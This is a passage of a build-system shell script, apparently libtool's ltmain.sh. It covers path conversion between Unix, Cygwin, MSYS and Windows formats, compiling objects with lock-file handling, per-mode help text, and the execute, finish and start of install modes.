} # end func_convert_file_noop # func_convert_file_msys_to_w32 ARG # Convert file name ARG from (mingw) MSYS to (mingw) w32 format; automatic # conversion to w32 is not available inside the cwrapper. Returns result in # func_to_host_file_result. func_convert_file_msys_to_w32 () { $debug_cmd func_to_host_file_result=$1 if test -n "$1"; then func_convert_core_msys_to_w32 "$1" func_to_host_file_result=$func_convert_core_msys_to_w32_result fi func_convert_file_check "$1" "$func_to_host_file_result" } # end func_convert_file_msys_to_w32 # func_convert_file_cygwin_to_w32 ARG # Convert file name ARG from Cygwin to w32 format. Returns result in # func_to_host_file_result. func_convert_file_cygwin_to_w32 () { $debug_cmd func_to_host_file_result=$1 if test -n "$1"; then # because $build is cygwin, we call "the" cygpath in $PATH; no need to use # LT_CYGPATH in this case. func_to_host_file_result=`cygpath -m "$1"` fi func_convert_file_check "$1" "$func_to_host_file_result" } # end func_convert_file_cygwin_to_w32 # func_convert_file_nix_to_w32 ARG # Convert file name ARG from *nix to w32 format. Requires a wine environment # and a working winepath. Returns result in func_to_host_file_result. func_convert_file_nix_to_w32 () { $debug_cmd func_to_host_file_result=$1 if test -n "$1"; then func_convert_core_file_wine_to_w32 "$1" func_to_host_file_result=$func_convert_core_file_wine_to_w32_result fi func_convert_file_check "$1" "$func_to_host_file_result" } # end func_convert_file_nix_to_w32 # func_convert_file_msys_to_cygwin ARG # Convert file name ARG from MSYS to Cygwin format. Requires LT_CYGPATH set. # Returns result in func_to_host_file_result. func_convert_file_msys_to_cygwin () { $debug_cmd func_to_host_file_result=$1 if test -n "$1"; then func_convert_core_msys_to_w32 "$1" func_cygpath -u "$func_convert_core_msys_to_w32_result" func_to_host_file_result=$func_cygpath_result fi func_convert_file_check "$1" "$func_to_host_file_result" } # end func_convert_file_msys_to_cygwin # func_convert_file_nix_to_cygwin ARG # Convert file name ARG from *nix to Cygwin format. Requires Cygwin installed # in a wine environment, working winepath, and LT_CYGPATH set. Returns result # in func_to_host_file_result. func_convert_file_nix_to_cygwin () { $debug_cmd func_to_host_file_result=$1 if test -n "$1"; then # convert from *nix to w32, then use cygpath to convert from w32 to cygwin. func_convert_core_file_wine_to_w32 "$1" func_cygpath -u "$func_convert_core_file_wine_to_w32_result" func_to_host_file_result=$func_cygpath_result fi func_convert_file_check "$1" "$func_to_host_file_result" } # end func_convert_file_nix_to_cygwin ############################################# # $build to $host PATH CONVERSION FUNCTIONS # ############################################# # invoked via '$to_host_path_cmd ARG' # # In each case, ARG is the path to be converted from $build to $host format. # The result will be available in $func_to_host_path_result. # # Path separators are also converted from $build format to $host format. If # ARG begins or ends with a path separator character, it is preserved (but # converted to $host format) on output. # # All path conversion functions are named using the following convention: # file name conversion function : func_convert_file_X_to_Y () # path conversion function : func_convert_path_X_to_Y () # where, for any given $build/$host combination the 'X_to_Y' value is the # same. If conversion functions are added for new $build/$host combinations, # the two new functions must follow this pattern, or func_init_to_host_path_cmd # will break. # func_init_to_host_path_cmd # Ensures that function "pointer" variable $to_host_path_cmd is set to the # appropriate value, based on the value of $to_host_file_cmd. to_host_path_cmd= func_init_to_host_path_cmd () { $debug_cmd if test -z "$to_host_path_cmd"; then func_stripname 'func_convert_file_' '' "$to_host_file_cmd" to_host_path_cmd=func_convert_path_$func_stripname_result fi } # func_to_host_path ARG # Converts the path ARG from $build format to $host format. Return result # in func_to_host_path_result. func_to_host_path () { $debug_cmd func_init_to_host_path_cmd $to_host_path_cmd "$1" } # end func_to_host_path # func_convert_path_noop ARG # Copy ARG to func_to_host_path_result. func_convert_path_noop () { func_to_host_path_result=$1 } # end func_convert_path_noop # func_convert_path_msys_to_w32 ARG # Convert path ARG from (mingw) MSYS to (mingw) w32 format; automatic # conversion to w32 is not available inside the cwrapper. Returns result in # func_to_host_path_result. func_convert_path_msys_to_w32 () { $debug_cmd func_to_host_path_result=$1 if test -n "$1"; then # Remove leading and trailing path separator characters from ARG. MSYS # behavior is inconsistent here; cygpath turns them into '.;' and ';.'; # and winepath ignores them completely. func_stripname : : "$1" func_to_host_path_tmp1=$func_stripname_result func_convert_core_msys_to_w32 "$func_to_host_path_tmp1" func_to_host_path_result=$func_convert_core_msys_to_w32_result func_convert_path_check : ";" \ "$func_to_host_path_tmp1" "$func_to_host_path_result" func_convert_path_front_back_pathsep ":*" "*:" ";" "$1" fi } # end func_convert_path_msys_to_w32 # func_convert_path_cygwin_to_w32 ARG # Convert path ARG from Cygwin to w32 format. Returns result in # func_to_host_file_result. func_convert_path_cygwin_to_w32 () { $debug_cmd func_to_host_path_result=$1 if test -n "$1"; then # See func_convert_path_msys_to_w32: func_stripname : : "$1" func_to_host_path_tmp1=$func_stripname_result func_to_host_path_result=`cygpath -m -p "$func_to_host_path_tmp1"` func_convert_path_check : ";" \ "$func_to_host_path_tmp1" "$func_to_host_path_result" func_convert_path_front_back_pathsep ":*" "*:" ";" "$1" fi } # end func_convert_path_cygwin_to_w32 # func_convert_path_nix_to_w32 ARG # Convert path ARG from *nix to w32 format. Requires a wine environment and # a working winepath. Returns result in func_to_host_file_result. func_convert_path_nix_to_w32 () { $debug_cmd func_to_host_path_result=$1 if test -n "$1"; then # See func_convert_path_msys_to_w32: func_stripname : : "$1" func_to_host_path_tmp1=$func_stripname_result func_convert_core_path_wine_to_w32 "$func_to_host_path_tmp1" func_to_host_path_result=$func_convert_core_path_wine_to_w32_result func_convert_path_check : ";" \ "$func_to_host_path_tmp1" "$func_to_host_path_result" func_convert_path_front_back_pathsep ":*" "*:" ";" "$1" fi } # end func_convert_path_nix_to_w32 # func_convert_path_msys_to_cygwin ARG # Convert path ARG from MSYS to Cygwin format. Requires LT_CYGPATH set. # Returns result in func_to_host_file_result. func_convert_path_msys_to_cygwin () { $debug_cmd func_to_host_path_result=$1 if test -n "$1"; then # See func_convert_path_msys_to_w32: func_stripname : : "$1" func_to_host_path_tmp1=$func_stripname_result func_convert_core_msys_to_w32 "$func_to_host_path_tmp1" func_cygpath -u -p "$func_convert_core_msys_to_w32_result" func_to_host_path_result=$func_cygpath_result func_convert_path_check : : \ "$func_to_host_path_tmp1" "$func_to_host_path_result" func_convert_path_front_back_pathsep ":*" "*:" : "$1" fi } # end func_convert_path_msys_to_cygwin # func_convert_path_nix_to_cygwin ARG # Convert path ARG from *nix to Cygwin format. Requires Cygwin installed in a # a wine environment, working winepath, and LT_CYGPATH set. Returns result in # func_to_host_file_result. func_convert_path_nix_to_cygwin () { $debug_cmd func_to_host_path_result=$1 if test -n "$1"; then # Remove leading and trailing path separator characters from # ARG. msys behavior is inconsistent here, cygpath turns them # into '.;' and ';.', and winepath ignores them completely. func_stripname : : "$1" func_to_host_path_tmp1=$func_stripname_result func_convert_core_path_wine_to_w32 "$func_to_host_path_tmp1" func_cygpath -u -p "$func_convert_core_path_wine_to_w32_result" func_to_host_path_result=$func_cygpath_result func_convert_path_check : : \ "$func_to_host_path_tmp1" "$func_to_host_path_result" func_convert_path_front_back_pathsep ":*" "*:" : "$1" fi } # end func_convert_path_nix_to_cygwin # func_dll_def_p FILE # True iff FILE is a Windows DLL '.def' file. # Keep in sync with _LT_DLL_DEF_P in libtool.m4 func_dll_def_p () { $debug_cmd func_dll_def_p_tmp=`$SED -n \ -e 's/^[ ]*//' \ -e '/^\(;.*\)*$/d' \ -e 's/^\(EXPORTS\|LIBRARY\)\([ ].*\)*$/DEF/p' \ -e q \ "$1"` test DEF = "$func_dll_def_p_tmp" } # func_mode_compile arg... func_mode_compile () { $debug_cmd # Get the compilation command and the source file. base_compile= srcfile=$nonopt # always keep a non-empty value in "srcfile" suppress_opt=yes suppress_output= arg_mode=normal libobj= later= pie_flag= for arg do case $arg_mode in arg ) # do not "continue". Instead, add this to base_compile lastarg=$arg arg_mode=normal ;; target ) libobj=$arg arg_mode=normal continue ;; normal ) # Accept any command-line options. case $arg in -o) test -n "$libobj" && \ func_fatal_error "you cannot specify '-o' more than once" arg_mode=target continue ;; -pie | -fpie | -fPIE) func_append pie_flag " $arg" continue ;; -shared | -static | -prefer-pic | -prefer-non-pic) func_append later " $arg" continue ;; -no-suppress) suppress_opt=no continue ;; -Xcompiler) arg_mode=arg # the next one goes into the "base_compile" arg list continue # The current "srcfile" will either be retained or ;; # replaced later. I would guess that would be a bug. -Wc,*) func_stripname '-Wc,' '' "$arg" args=$func_stripname_result lastarg= save_ifs=$IFS; IFS=, for arg in $args; do IFS=$save_ifs func_append_quoted lastarg "$arg" done IFS=$save_ifs func_stripname ' ' '' "$lastarg" lastarg=$func_stripname_result # Add the arguments to base_compile. func_append base_compile " $lastarg" continue ;; *) # Accept the current argument as the source file. # The previous "srcfile" becomes the current argument. # lastarg=$srcfile srcfile=$arg ;; esac # case $arg ;; esac # case $arg_mode # Aesthetically quote the previous argument. func_append_quoted base_compile "$lastarg" done # for arg case $arg_mode in arg) func_fatal_error "you must specify an argument for -Xcompile" ;; target) func_fatal_error "you must specify a target with '-o'" ;; *) # Get the name of the library object. test -z "$libobj" && { func_basename "$srcfile" libobj=$func_basename_result } ;; esac # Recognize several different file suffixes. # If the user specifies -o file.o, it is replaced with file.lo case $libobj in *.[cCFSifmso] | \ *.ada | *.adb | *.ads | *.asm | \ *.c++ | *.cc | *.ii | *.class | *.cpp | *.cxx | \ *.[fF][09]? | *.for | *.java | *.go | *.obj | *.sx | *.cu | *.cup) func_xform "$libobj" libobj=$func_xform_result ;; esac case $libobj in *.lo) func_lo2o "$libobj"; obj=$func_lo2o_result ;; *) func_fatal_error "cannot determine name of library object from '$libobj'" ;; esac func_infer_tag $base_compile for arg in $later; do case $arg in -shared) test yes = "$build_libtool_libs" \ || func_fatal_configuration "cannot build a shared library" build_old_libs=no continue ;; -static) build_libtool_libs=no build_old_libs=yes continue ;; -prefer-pic) pic_mode=yes continue ;; -prefer-non-pic) pic_mode=no continue ;; esac done func_quote_arg pretty "$libobj" test "X$libobj" != "X$func_quote_arg_result" \ && $ECHO "X$libobj" | $GREP '[]~#^*{};<>?"'"'"' &()|`$[]' \ && func_warning "libobj name '$libobj' may not contain shell special characters." func_dirname_and_basename "$obj" "/" "" objname=$func_basename_result xdir=$func_dirname_result lobj=$xdir$objdir/$objname test -z "$base_compile" && \ func_fatal_help "you must specify a compilation command" # Delete any leftover library objects. if test yes = "$build_old_libs"; then removelist="$obj $lobj $libobj ${libobj}T" else removelist="$lobj $libobj ${libobj}T" fi # On Cygwin there's no "real" PIC flag so we must build both object types case $host_os in cygwin* | mingw* | pw32* | os2* | cegcc*) pic_mode=default ;; esac if test no = "$pic_mode" && test pass_all != "$deplibs_check_method"; then # non-PIC code in shared libraries is not supported pic_mode=default fi # Calculate the filename of the output object if compiler does # not support -o with -c if test no = "$compiler_c_o"; then output_obj=`$ECHO "$srcfile" | $SED 's%^.*/%%; s%\.[^.]*$%%'`.$objext lockfile=$output_obj.lock else output_obj= need_locks=no lockfile= fi # Lock this critical section if it is needed # We use this script file to make the link, it avoids creating a new file if test yes = "$need_locks"; then until $opt_dry_run || ln "$progpath" "$lockfile" 2>/dev/null; do func_echo "Waiting for $lockfile to be removed" sleep 2 done elif test warn = "$need_locks"; then if test -f "$lockfile"; then $ECHO "\ *** ERROR, $lockfile exists and contains: `cat $lockfile 2>/dev/null` This indicates that another process is trying to use the same temporary object file, and libtool could not work around it because your compiler does not support '-c' and '-o' together. If you repeat this compilation, it may succeed, by chance, but you had better avoid parallel builds (make -j) in this platform, or get a better compiler." $opt_dry_run || $RM $removelist exit $EXIT_FAILURE fi func_append removelist " $output_obj" $ECHO "$srcfile" > "$lockfile" fi $opt_dry_run || $RM $removelist func_append removelist " $lockfile" trap '$opt_dry_run || $RM $removelist; exit $EXIT_FAILURE' 1 2 15 func_to_tool_file "$srcfile" func_convert_file_msys_to_w32 srcfile=$func_to_tool_file_result func_quote_arg pretty "$srcfile" qsrcfile=$func_quote_arg_result # Only build a PIC object if we are building libtool libraries. if test yes = "$build_libtool_libs"; then # Without this assignment, base_compile gets emptied. fbsd_hideous_sh_bug=$base_compile if test no != "$pic_mode"; then command="$base_compile $qsrcfile $pic_flag" else # Don't build PIC code command="$base_compile $qsrcfile" fi func_mkdir_p "$xdir$objdir" if test -z "$output_obj"; then # Place PIC objects in $objdir func_append command " -o $lobj" fi func_show_eval_locale "$command" \ 'test -n "$output_obj" && $RM $removelist; exit $EXIT_FAILURE' if test warn = "$need_locks" && test "X`cat $lockfile 2>/dev/null`" != "X$srcfile"; then $ECHO "\ *** ERROR, $lockfile contains: `cat $lockfile 2>/dev/null` but it should contain: $srcfile This indicates that another process is trying to use the same temporary object file, and libtool could not work around it because your compiler does not support '-c' and '-o' together. If you repeat this compilation, it may succeed, by chance, but you had better avoid parallel builds (make -j) in this platform, or get a better compiler." $opt_dry_run || $RM $removelist exit $EXIT_FAILURE fi # Just move the object if needed, then go on to compile the next one if test -n "$output_obj" && test "X$output_obj" != "X$lobj"; then func_show_eval '$MV "$output_obj" "$lobj"' \ 'error=$?; $opt_dry_run || $RM $removelist; exit $error' fi # Allow error messages only from the first compilation. if test yes = "$suppress_opt"; then suppress_output=' >/dev/null 2>&1' fi fi # Only build a position-dependent object if we build old libraries. if test yes = "$build_old_libs"; then if test yes != "$pic_mode"; then # Don't build PIC code command="$base_compile $qsrcfile$pie_flag" else command="$base_compile $qsrcfile $pic_flag" fi if test yes = "$compiler_c_o"; then func_append command " -o $obj" fi # Suppress compiler output if we already did a PIC compilation. func_append command "$suppress_output" func_show_eval_locale "$command" \ '$opt_dry_run || $RM $removelist; exit $EXIT_FAILURE' if test warn = "$need_locks" && test "X`cat $lockfile 2>/dev/null`" != "X$srcfile"; then $ECHO "\ *** ERROR, $lockfile contains: `cat $lockfile 2>/dev/null` but it should contain: $srcfile This indicates that another process is trying to use the same temporary object file, and libtool could not work around it because your compiler does not support '-c' and '-o' together. If you repeat this compilation, it may succeed, by chance, but you had better avoid parallel builds (make -j) in this platform, or get a better compiler." $opt_dry_run || $RM $removelist exit $EXIT_FAILURE fi # Just move the object if needed if test -n "$output_obj" && test "X$output_obj" != "X$obj"; then func_show_eval '$MV "$output_obj" "$obj"' \ 'error=$?; $opt_dry_run || $RM $removelist; exit $error' fi fi $opt_dry_run || { func_write_libtool_object "$libobj" "$objdir/$objname" "$objname" # Unlock the critical section if it was locked if test no != "$need_locks"; then removelist=$lockfile $RM "$lockfile" fi } exit $EXIT_SUCCESS } $opt_help || { test compile = "$opt_mode" && func_mode_compile ${1+"$@"} } func_mode_help () { # We need to display help for each of the modes. case $opt_mode in "") # Generic help is extracted from the usage comments # at the start of this file. func_help ;; clean) $ECHO \ "Usage: $progname [OPTION]... --mode=clean RM [RM-OPTION]... FILE... Remove files from the build directory. RM is the name of the program to use to delete files associated with each FILE (typically '/bin/rm'). RM-OPTIONS are options (such as '-f') to be passed to RM. If FILE is a libtool library, object or program, all the files associated with it are deleted. Otherwise, only FILE itself is deleted using RM." ;; compile) $ECHO \ "Usage: $progname [OPTION]... --mode=compile COMPILE-COMMAND... SOURCEFILE Compile a source file into a libtool library object. This mode accepts the following additional options: -o OUTPUT-FILE set the output file name to OUTPUT-FILE -no-suppress do not suppress compiler output for multiple passes -prefer-pic try to build PIC objects only -prefer-non-pic try to build non-PIC objects only -shared do not build a '.o' file suitable for static linking -static only build a '.o' file suitable for static linking -Wc,FLAG pass FLAG directly to the compiler COMPILE-COMMAND is a command to be used in creating a 'standard' object file from the given SOURCEFILE. The output file name is determined by removing the directory component from SOURCEFILE, then substituting the C source code suffix '.c' with the library object suffix, '.lo'." ;; execute) $ECHO \ "Usage: $progname [OPTION]... --mode=execute COMMAND [ARGS]... Automatically set library path, then run a program. This mode accepts the following additional options: -dlopen FILE add the directory containing FILE to the library path This mode sets the library path environment variable according to '-dlopen' flags. If any of the ARGS are libtool executable wrappers, then they are translated into their corresponding uninstalled binary, and any of their required library directories are added to the library path. Then, COMMAND is executed, with ARGS as arguments." ;; finish) $ECHO \ "Usage: $progname [OPTION]... --mode=finish [LIBDIR]... Complete the installation of libtool libraries. Each LIBDIR is a directory that contains libtool libraries. The commands that this mode executes may require superuser privileges. Use the '--dry-run' option if you just want to see what would be executed." ;; install) $ECHO \ "Usage: $progname [OPTION]... --mode=install INSTALL-COMMAND... Install executables or libraries. INSTALL-COMMAND is the installation command. The first component should be either the 'install' or 'cp' program. The following components of INSTALL-COMMAND are treated specially: -inst-prefix-dir PREFIX-DIR Use PREFIX-DIR as a staging area for installation The rest of the components are interpreted as arguments to that command (only BSD-compatible install options are recognized)." ;; link) $ECHO \ "Usage: $progname [OPTION]... --mode=link LINK-COMMAND... Link object files or libraries together to form another library, or to create an executable program. LINK-COMMAND is a command using the C compiler that you would use to create a program from several object files. The following components of LINK-COMMAND are treated specially: -all-static do not do any dynamic linking at all -avoid-version do not add a version suffix if possible -bindir BINDIR specify path to binaries directory (for systems where libraries must be found in the PATH setting at runtime) -dlopen FILE '-dlpreopen' FILE if it cannot be dlopened at runtime -dlpreopen FILE link in FILE and add its symbols to lt_preloaded_symbols -export-dynamic allow symbols from OUTPUT-FILE to be resolved with dlsym(3) -export-symbols SYMFILE try to export only the symbols listed in SYMFILE -export-symbols-regex REGEX try to export only the symbols matching REGEX -LLIBDIR search LIBDIR for required installed libraries -lNAME OUTPUT-FILE requires the installed library libNAME -module build a library that can dlopened -no-fast-install disable the fast-install mode -no-install link a not-installable executable -no-undefined declare that a library does not refer to external symbols -o OUTPUT-FILE create OUTPUT-FILE from the specified objects -objectlist FILE use a list of object files found in FILE to specify objects -os2dllname NAME force a short DLL name on OS/2 (no effect on other OSes) -precious-files-regex REGEX don't remove output files matching REGEX -release RELEASE specify package release information -rpath LIBDIR the created library will eventually be installed in LIBDIR -R[ ]LIBDIR add LIBDIR to the runtime path of programs and libraries -shared only do dynamic linking of libtool libraries -shrext SUFFIX override the standard shared library file extension -static do not do any dynamic linking of uninstalled libtool libraries -static-libtool-libs do not do any dynamic linking of libtool libraries -version-info CURRENT[:REVISION[:AGE]] specify library version info [each variable defaults to 0] -weak LIBNAME declare that the target provides the LIBNAME interface -Wc,FLAG -Xcompiler FLAG pass linker-specific FLAG directly to the compiler -Wl,FLAG -Xlinker FLAG pass linker-specific FLAG directly to the linker -XCClinker FLAG pass link-specific FLAG to the compiler driver (CC) All other options (arguments beginning with '-') are ignored. Every other argument is treated as a filename. Files ending in '.la' are treated as uninstalled libtool libraries, other files are standard or library object files. If the OUTPUT-FILE ends in '.la', then a libtool library is created, only library objects ('.lo' files) may be specified, and '-rpath' is required, except when creating a convenience library. If OUTPUT-FILE ends in '.a' or '.lib', then a standard library is created using 'ar' and 'ranlib', or on Windows using 'lib'. If OUTPUT-FILE ends in '.lo' or '.$objext', then a reloadable object file is created, otherwise an executable program is created." ;; uninstall) $ECHO \ "Usage: $progname [OPTION]... --mode=uninstall RM [RM-OPTION]... FILE... Remove libraries from an installation directory. RM is the name of the program to use to delete files associated with each FILE (typically '/bin/rm'). RM-OPTIONS are options (such as '-f') to be passed to RM. If FILE is a libtool library, all the files associated with it are deleted. Otherwise, only FILE itself is deleted using RM." ;; *) func_fatal_help "invalid operation mode '$opt_mode'" ;; esac echo $ECHO "Try '$progname --help' for more information about other modes." } # Now that we've collected a possible --mode arg, show help if necessary if $opt_help; then if test : = "$opt_help"; then func_mode_help else { func_help noexit for opt_mode in compile link execute install finish uninstall clean; do func_mode_help done } | $SED -n '1p; 2,$s/^Usage:/ or: /p' { func_help noexit for opt_mode in compile link execute install finish uninstall clean; do echo func_mode_help done } | $SED '1d /^When reporting/,/^Report/{ H d } $x /information about other modes/d /more detailed .*MODE/d s/^Usage:.*--mode=\([^ ]*\) .*/Description of \1 mode:/' fi exit $? fi # func_mode_execute arg... func_mode_execute () { $debug_cmd # The first argument is the command name. cmd=$nonopt test -z "$cmd" && \ func_fatal_help "you must specify a COMMAND" # Handle -dlopen flags immediately. for file in $opt_dlopen; do test -f "$file" \ || func_fatal_help "'$file' is not a file" dir= case $file in *.la) func_resolve_sysroot "$file" file=$func_resolve_sysroot_result # Check to see that this really is a libtool archive. func_lalib_unsafe_p "$file" \ || func_fatal_help "'$lib' is not a valid libtool archive" # Read the libtool library. dlname= library_names= func_source "$file" # Skip this library if it cannot be dlopened. if test -z "$dlname"; then # Warn if it was a shared library. test -n "$library_names" && \ func_warning "'$file' was not linked with '-export-dynamic'" continue fi func_dirname "$file" "" "." dir=$func_dirname_result if test -f "$dir/$objdir/$dlname"; then func_append dir "/$objdir" else if test ! -f "$dir/$dlname"; then func_fatal_error "cannot find '$dlname' in '$dir' or '$dir/$objdir'" fi fi ;; *.lo) # Just add the directory containing the .lo file. func_dirname "$file" "" "." dir=$func_dirname_result ;; *) func_warning "'-dlopen' is ignored for non-libtool libraries and objects" continue ;; esac # Get the absolute pathname. absdir=`cd "$dir" && pwd` test -n "$absdir" && dir=$absdir # Now add the directory to shlibpath_var. if eval "test -z \"\$$shlibpath_var\""; then eval "$shlibpath_var=\"\$dir\"" else eval "$shlibpath_var=\"\$dir:\$$shlibpath_var\"" fi done # This variable tells wrapper scripts just to set shlibpath_var # rather than running their programs. libtool_execute_magic=$magic # Check if any of the arguments is a wrapper script. args= for file do case $file in -* | *.la | *.lo ) ;; *) # Do a test to see if this is really a libtool program. if func_ltwrapper_script_p "$file"; then func_source "$file" # Transform arg to wrapped name. file=$progdir/$program elif func_ltwrapper_executable_p "$file"; then func_ltwrapper_scriptname "$file" func_source "$func_ltwrapper_scriptname_result" # Transform arg to wrapped name. file=$progdir/$program fi ;; esac # Quote arguments (to preserve shell metacharacters). func_append_quoted args "$file" done if $opt_dry_run; then # Display what would be done. if test -n "$shlibpath_var"; then eval "\$ECHO \"\$shlibpath_var=\$$shlibpath_var\"" echo "export $shlibpath_var" fi $ECHO "$cmd$args" exit $EXIT_SUCCESS else if test -n "$shlibpath_var"; then # Export the shlibpath_var. eval "export $shlibpath_var" fi # Restore saved environment variables for lt_var in LANG LANGUAGE LC_ALL LC_CTYPE LC_COLLATE LC_MESSAGES do eval "if test \"\${save_$lt_var+set}\" = set; then $lt_var=\$save_$lt_var; export $lt_var else $lt_unset $lt_var fi" done # Now prepare to actually exec the command. exec_cmd=\$cmd$args fi } test execute = "$opt_mode" && func_mode_execute ${1+"$@"} # func_mode_finish arg... func_mode_finish () { $debug_cmd libs= libdirs= admincmds= for opt in "$nonopt" ${1+"$@"} do if test -d "$opt"; then func_append libdirs " $opt" elif test -f "$opt"; then if func_lalib_unsafe_p "$opt"; then func_append libs " $opt" else func_warning "'$opt' is not a valid libtool archive" fi else func_fatal_error "invalid argument '$opt'" fi done if test -n "$libs"; then if test -n "$lt_sysroot"; then sysroot_regex=`$ECHO "$lt_sysroot" | $SED "$sed_make_literal_regex"` sysroot_cmd="s/\([ ']\)$sysroot_regex/\1/g;" else sysroot_cmd= fi # Remove sysroot references if $opt_dry_run; then for lib in $libs; do echo "removing references to $lt_sysroot and '=' prefixes from $lib" done else tmpdir=`func_mktempdir` for lib in $libs; do $SED -e "$sysroot_cmd s/\([ ']-[LR]\)=/\1/g; s/\([ ']\)=/\1/g" $lib \ > $tmpdir/tmp-la mv -f $tmpdir/tmp-la $lib done ${RM}r "$tmpdir" fi fi if test -n "$finish_cmds$finish_eval" && test -n "$libdirs"; then for libdir in $libdirs; do if test -n "$finish_cmds"; then # Do each command in the finish commands. func_execute_cmds "$finish_cmds" 'admincmds="$admincmds '"$cmd"'"' fi if test -n "$finish_eval"; then # Do the single finish_eval. eval cmds=\"$finish_eval\" $opt_dry_run || eval "$cmds" || func_append admincmds " $cmds" fi done fi # Exit here if they wanted silent mode. $opt_quiet && exit $EXIT_SUCCESS if test -n "$finish_cmds$finish_eval" && test -n "$libdirs"; then echo "----------------------------------------------------------------------" echo "Libraries have been installed in:" for libdir in $libdirs; do $ECHO " $libdir" done echo echo "If you ever happen to want to link against installed libraries" echo "in a given directory, LIBDIR, you must either use libtool, and" echo "specify the full pathname of the library, or use the '-LLIBDIR'" echo "flag during linking and do at least one of the following:" if test -n "$shlibpath_var"; then echo " - add LIBDIR to the '$shlibpath_var' environment variable" echo " during execution" fi if test -n "$runpath_var"; then echo " - add LIBDIR to the '$runpath_var' environment variable" echo " during linking" fi if test -n "$hardcode_libdir_flag_spec"; then libdir=LIBDIR eval flag=\"$hardcode_libdir_flag_spec\" $ECHO " - use the '$flag' linker flag" fi if test -n "$admincmds"; then $ECHO " - have your system administrator run these commands:$admincmds" fi if test -f /etc/ld.so.conf; then echo " - have your system administrator add LIBDIR to '/etc/ld.so.conf'" fi echo echo "See any operating system documentation about shared libraries for" case $host in solaris2.[6789]|solaris2.1[0-9]) echo "more information, such as the ld(1), crle(1) and ld.so(8) manual" echo "pages." ;; *) echo "more information, such as the ld(1) and ld.so(8) manual pages." ;; esac echo "----------------------------------------------------------------------" fi exit $EXIT_SUCCESS } test finish = "$opt_mode" && func_mode_finish ${1+"$@"} # func_mode_install arg... func_mode_install () { $debug_cmd # There may be an optional sh(1) argument at the beginning of # install_prog (especially on Windows NT). if test "$SHELL" = "$nonopt" || test /bin/sh = "$nonopt" || # Allow the use of GNU shtool's install command. case $nonopt in *shtool*) :;; *) false;; esac then # Aesthetically quote it. func_quote_arg pretty "$nonopt" install_prog="$func_quote_arg_result " arg=$1 shift else install_prog= arg=$nonopt fi # The real first argument should be the name of the installation program. # Aesthetically quote it. func_quote_arg pretty "$arg" func_append install_prog "$func_quote_arg_result" install_shared_prog=$install_prog case " $install_prog " in *[\\\ /]cp\ *) install_cp=: ;; *) install_cp=false ;; esac # We need to accept at least all the BSD install flags. dest= files= opts= prev= install_type= isdir=false stripme= no_mode=: for arg do arg2= if test -n "$dest"; then func_append files " $dest" dest=$arg continue fi case $arg in -d) isdir=: ;; -f) if $install_cp; then :; else prev=$arg fi ;; -g | -m | -o) prev=$arg ;; -s) stripme=" -s" continue ;; -*) ;; *) # If the previous option needed an argument, then skip it. if test -n "$prev"; then if test X-m = "X$prev" && test -n "$install_override_mode"; then arg2=$install_override_mode no_mode=false fi prev= else dest=$arg continue fi ;; esac # Aesthetically quote the argument. func_quote_arg pretty "$arg" func_append install_prog " $func_quote_arg_result" if test -n "$arg2"; then func_quote_arg pretty "$arg2" fi func_append install_shared_prog " $func_quote_arg_result" done test -z "$install_prog" && \ func_fatal_help "you must specify an install program" test -n "$prev" && \ func_fatal_help "the '$prev' option requires an argument" if test -n "$install_override_mode" && $no_mode; then if $install_cp; then :; else func_quote_arg pretty "$install_override_mode" func_append install_shared_prog " -m $func_quote_arg_result" fi fi if test -z "$files"; then if test -z "$dest"; then func_fatal_help "no file or destination specified" else func_fatal_help "you must specify a destination" fi fi # Strip any trailing slash from the destination. func_stripname '' '/' "$dest" dest=$func_stripname_result # Check to see that the destination is a directory. test -d "$dest" && isdir=: if $isdir; then destdir=$dest destname= else func_dirname_and_basename "$dest" "" "." destdir=$func_dirname_result destname=$func_basename_result # Not a directory, so check to see that there is only one file specified. set dummy $files; shift test "$#" -gt 1 && \ func_fatal_help "'$dest' is not a directory" fi case $destdir in [\\/]* | [A-Za-z]:[\\/]*) ;; *) for file in $files; do case $file in *.lo) ;; *) func_fatal_help "'$destdir' must be an absolute directory name" ;; esac done ;; esac # This variable tells wrapper scripts just to set variables rather # than running their programs. libtool_install_magic=$magic staticlibs= future_libdirs= current_libdirs= for file in $files; do # Do each installation. case $file in *.$libext) # Do the static libraries later. func_append staticlibs " $file" ;; *.la) func_resolve_sysroot "$file" file=$func_resolve_sysroot_result # Check to see that this really is a libtool archive. func_lalib_unsafe_p "$file" \ || func_fatal_help "'$file' is not a valid libtool archive" library_names= old_library= relink_command= func_source "$file" # Add the libdir to current_libdirs if it is the destination. if test "X$destdir" = "X$libdir"; then case "$current_libdirs " in *" $libdir "*) ;; *) func_append current_libdirs " $libdir" ;; esac else # Note the libdir as a future libdir. case "$future_libdirs " in *" $libdir "*) ;; *) func_append future_libdirs " $libdir" ;; esac fi func_dirname "$file" "/" "" dir=$func_dirname_result func_append dir "$objdir" if test -n "$relink_command"; then # Determine the prefix the user has applied to our future dir. inst_prefix_dir=`$ECHO "$destdir" | $SED -e "s%$libdir\$%%"` # Don't allow the user to place us outside of our expected # location b/c this prevents finding dependent libraries that # are installed to the same prefix. # At present, this check doesn't affect windows .dll's that # are installed into $libdir/../bin (currently, that works fine) # but it's something to keep an eye on. test "$inst_prefix_dir" = "$destdir" && \ func_fatal_error "error: cannot install '$file' to a directory not ending in $libdir" if test -n "$inst_prefix_dir"; then # Stick the inst_prefix_dir data into the link command. relink_command=`$ECHO "$relink_command" | $SED "s%@inst_prefix_dir@%-inst-prefix-dir $inst_prefix_dir%"` else relink_command=`$ECHO "$relink_command" | $SED "s%@inst_prefix_dir@%%"` fi func_warning "relinking '$file'" func_show_eval "$relink_command" \ 'func_fatal_error "error: relink '\''$file'\'' with the above command before installing it"' fi # See the names of the shared library. set dummy $library_names; shift if test -n "$1"; then realname=$1 shift srcname=$realname test -n "$relink_command" && srcname=${realname}T # Install the shared library and build the symlinks. func_show_eval "$install_shared_prog $dir/$srcname $destdir/$realname" \ 'exit $?' tstripme=$stripme case $host_os in cygwin* | mingw* | pw32* | cegcc*) case $realname in *.dll.a) tstripme= ;; esac ;; os2*) case $realname in *_dll.a) tstripme= ;; esac ;; esac if test -n "$tstripme" && test -n "$striplib"; then func_show_eval "$striplib $destdir/$realname" 'exit $?' fi if test "$#" -gt 0; then # Delete the old symlinks, and create new ones. # Try 'ln -sf' first, because the 'ln' binary might depend on # the symlink we replace! Solaris /bin/ln does not understand -f, # so we also need to try rm && ln -s. for linkname do test "$linkname" != "$realname" \ && func_show_eval "(cd $destdir && { $LN_S -f $realname $linkname || { $RM $linkname && $LN_S $realname $linkname; }; })" done fi # Do each command in the postinstall commands. lib=$destdir/$realname 